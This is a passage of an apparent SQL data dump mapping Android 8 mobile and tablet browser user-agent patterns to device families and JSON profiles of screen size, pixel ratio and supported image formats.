Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AX1082) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AX687) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AX751) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AX823) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AX830) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AX960) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Active 1+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":861,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Advance 5.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Advance L4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Advance L5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Alcatel_5008R) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Alcatel_5059R) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_alcatel','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Aligator_S5066) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; AllCall_S1_X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Allure M2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Allure M3 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Allure M3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Aquaris C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Aquaris U2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Aquaris V Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Aquaris V) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Aquaris VS Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Aquaris VS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Aquaris X Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Aquaris X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Archos Access 50S 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Archos Access 57 3G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Archos Access 57 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_archos','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Armor_3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Armor_6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Armor_X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Armor_X2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Avvio_Q503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_avvio','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Azumi A4+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; B245) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; B260) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; B340) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; B355) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; B450) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; B502 Basic) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; B504_Unit) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; B505_Unit_4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; B8506) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BAC-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BAC-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BAC-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BAC-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BAH2-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BAH2-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BAH2-W19) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BBB100-1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":617,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BBB100-2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":617,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BBB100-5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":617,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BBB100-7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":617,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BBD100-1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BBD100-2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BBD100-6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BBE100-1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":617,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BBE100-2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":617,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BBE100-4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":617,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BBE100-5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":617,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BBF100-1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":617,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BBF100-2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":617,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BBF100-6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":617,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BBF100-9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":617,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BBG100-1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":864,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BKK-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BKK-L21) AppleWebKit/* (KHTML, like Gecko) Chrome (lite) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BKK-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BKK-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BKL-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BL150) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BL250) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BL5500_Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BL9000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BLA-A09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BLA-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BLA-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BLACK_PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BLADE A3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BLADE A530) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BLADE V Ultra) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BLADE V9 VITA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; BLADE V9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; 